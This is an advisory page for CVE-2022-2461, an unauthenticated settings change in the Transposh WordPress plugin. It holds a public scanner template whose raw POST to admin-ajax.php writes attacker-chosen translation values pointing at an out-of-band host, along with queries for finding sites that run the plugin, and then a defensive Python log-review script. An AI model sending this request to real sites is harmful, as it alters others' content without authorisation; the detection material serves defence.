CVE-2022-2461: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change

Date: 2025-08-01 | Affected software: Transposh WordPress Translation | PoC: Public

Vulnerability description

The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.

PoC code [public]

id: CVE-2022-2461

info:
  name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
  author: riteshs4hu
  severity: medium
  description: |
    The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
  reference:
    - https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-2461
    cwe-id: CWE-862
    epss-score: 0.25426
    epss-percentile: 0.96025
    cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: transposh
    product: transposh_wordpress_translation
    framework: wordpress
    publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
    fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
  tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak

variables:
  redirect_uri: "oast.me"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, '200 - backup in sync')"
          - "contains(content_type, 'text/html')"
          - "status_code == 200"
        condition: and

    extractors:
      - type: regex
        part: header
        regex:
          - "Transposh: v-[0-9.]+"
# digest: 4a0a00473045022027fb224ff0faa9e5ea0af958f1b4a3b18a3292bdd34b08ae87a725af50c6cc32022100ab6f832d9232ea0ead8c055de8e33309bc691aadb18e11a7db835e6afb27408f:922c64590222798bb761d5b6d8e72950
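
For defenders, the same request shape can be hunted for in request logs. The following is an added example, not part of the template or of the Transposh project: it flags POSTs to `admin-ajax.php` that carry `action=tp_translation` and no WordPress login cookie, so they can be reviewed. The JSON-lines record layout (`ts`, `src`, `method`, `uri`, `cookies`, `body`) and the sample records are assumptions constructed for illustration; a proxy or WAF that records request bodies is required.

```python
import json
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "tp_translation"               # AJAX action named in the advisory
LOGIN_COOKIE = "wordpress_logged_in_"   # prefix of the WordPress login cookie name
FIELDS = ("ln0", "sr0", "tk0", "tr0")   # parameters the template sends

# Constructed sample records; the JSON-lines layout is an assumption.
SAMPLE_LOG = [
    '{"ts":"2025-08-01T10:00:01Z","src":"203.0.113.7","method":"POST","uri":"/wp-admin/admin-ajax.php","cookies":[],"body":"action=tp_translation&ln0=en&sr0=1&items=1&tk0=Welcome&tr0=Changed+text"}',
    '{"ts":"2025-08-01T10:02:10Z","src":"192.0.2.15","method":"POST","uri":"/wp-admin/admin-ajax.php","cookies":["wordpress_logged_in_0123abcd"],"body":"action=tp_translation&ln0=en&sr0=1&items=1&tk0=Welcome&tr0=Hello"}',
    '{"ts":"2025-08-01T10:03:00Z","src":"192.0.2.15","method":"POST","uri":"/wp-admin/admin-ajax.php","cookies":[],"body":"action=heartbeat"}',
    '{"ts":"2025-08-01T10:04:30Z","src":"198.51.100.23","method":"POST","uri":"/blog/wp-admin/admin-ajax.php?action=tp_translation","cookies":[],"body":"ln0=de&sr0=1&items=1&tk0=Home&tr0=Replaced"}',
    'not json at all',
]

def review_fields(rec):
    """Return the submitted fields if rec is a tp_translation POST without a login cookie."""
    if rec.get("method") != "POST":
        return None
    url = urlsplit(rec.get("uri", ""))
    if not url.path.endswith(AJAX_PATH):   # also matches subdirectory installs
        return None
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    for key, val in parse_qs(url.query, keep_blank_values=True).items():
        params.setdefault(key, val)        # action may sit in the query string
    if ACTION not in params.get("action", []):
        return None
    if any(c.startswith(LOGIN_COOKIE) for c in rec.get("cookies", [])):
        return None                        # cookie present; validity is not checked here
    return {k: params[k][0] for k in FIELDS if k in params}

def scan(lines):
    """Return (timestamp, source, fields) for each request worth reviewing."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                       # skip malformed lines
        if not isinstance(rec, dict):
            continue
        fields = review_fields(rec)
        if fields is not None:
            hits.append((rec.get("ts"), rec.get("src"), fields))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit is a lead for review rather than proof of abuse, since the advisory notes that the default settings accept these submissions; compare the reported fields with the translations currently stored on the site.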